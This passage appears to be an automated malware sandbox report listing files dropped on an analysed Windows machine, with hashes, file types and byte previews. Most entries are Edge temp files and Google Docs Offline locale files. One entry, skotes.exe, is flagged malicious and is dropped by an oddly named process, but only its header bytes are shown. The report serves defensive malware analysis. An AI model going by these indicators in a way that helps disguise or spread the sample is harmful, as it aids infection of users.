C:\Users\user\AppData\Local\Temp\34d0534d-8df8-4502-ac1c-b17c5545f7ce.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\5309a0b4-bae9-4105-b93d-e2b0498bfe14.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
Category:	dropped
Size (bytes):	76314
Entropy (8bit):	7.996159328201069
Encrypted:	true
SSDEEP:	1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
MD5:	703D592C85D2790D89047C1614A54B4F
SHA1:	0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
SHA-256:	A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
SHA-512:	D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
Malicious:	false
Preview:	...........}io.8..w... @..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..\|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r\|\|z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....\|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#\|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

C:\Users\user\AppData\Local\Temp\6fcba4d9-77aa-4992-b7f6-b50b556c06bf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\740caac0-0f01-40d8-99c6-8c0a787e5090.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsDBKKKEHDHC.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1951744
Entropy (8bit):	7.950084187380955
Encrypted:	false
SSDEEP:	49152:ONNzdkFg30Kk74f4wiVZLfGRf7s9HtjOThexHJ5C0o:2gFuW0wwiLfG1sbjOSJ5C0o
MD5:	60345799039B0C985D836024C003B152
SHA1:	54715118A518158F52DE07BAA3282B605350D7BA
SHA-256:	338A8F4956CDD830B17B6B501E525C8337AB7916459684643116FCECA31D4A9A
SHA-512:	B8F2F62C5561E96CB9929E060893FC6D2D9FDA3E5E508A211B046501B360015A85C59490F6BB1C89ED2B48BA55D46028373ED50769BB16E269C7744AA9A9202B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................0M...........@..........................`M......7....@.................................W...k.......D.....................M.............................d.M..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..+.........................@...zmgocjct.....p2.....................@...whbetzff..... M.....................@....taggant.0...0M.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ba376185-15ce-41ed-b868-e4e167ba0d46.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1536016
Entropy (8bit):	7.992504617071112
Encrypted:	true
SSDEEP:	24576:rBOet7PfD5V/OLsFNfIw8nQY3go5JVFy9+jRpdcbNoTMhpL0e7HS2tHSs9IIIX31:Tt7nD5V/dNfQQYXfVFyORPINoTMz57ji
MD5:	B92C46FF9723CED0246587EAF43CB652
SHA1:	75970355209B75D87930A4771E97F417D0FAC210
SHA-256:	645C2C6B04C791C0335357648BA25FC8D42277D8C4A68D3BD2E6C40C24732C56
SHA-512:	07797751F05A4411F96E8A35E00D689CD83F87DC32DF1137CFE0B63A30D8F46B2B77DC0B4821156C7C45B526FFA206BFA05E078F71AA707B7423EDA1922F6CEA
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.\|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ.>...i.v....A.CD\|bfx....).o.g.....I....6...!....<.t\|"....PO<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....\|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~..&........:]...w.md./zkT.Z..F........,."7\|.\|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..\|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	5.4286816197091845
Encrypted:	false
SSDEEP:	48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0+Vd56IU0Rt5M:JIVuwEw5MUFZLBQLtP5lnM
MD5:	C9664721C893F2C144893CDC0B10EBB6
SHA1:	A30301049A946BA0A81510CE616E0259353705B3
SHA-256:	B7C0A9BC0F3C36E5C0CB0AC54EC786D508526B3AE5E695C6D6DD9CADD5933338
SHA-512:	8FBF89AF5C43062150B2F27B0B8AF8A36884BA4E01893A628FC003DA528013E4095F02400642F3B3E482B008435647EFF6CD1957F8601C1E85213043844CBC36
Malicious:	false
Preview:	{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

C:\Users\user\AppData\Local\Temp\dbb5af53-bfde-403d-8b65-703e23a7026a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
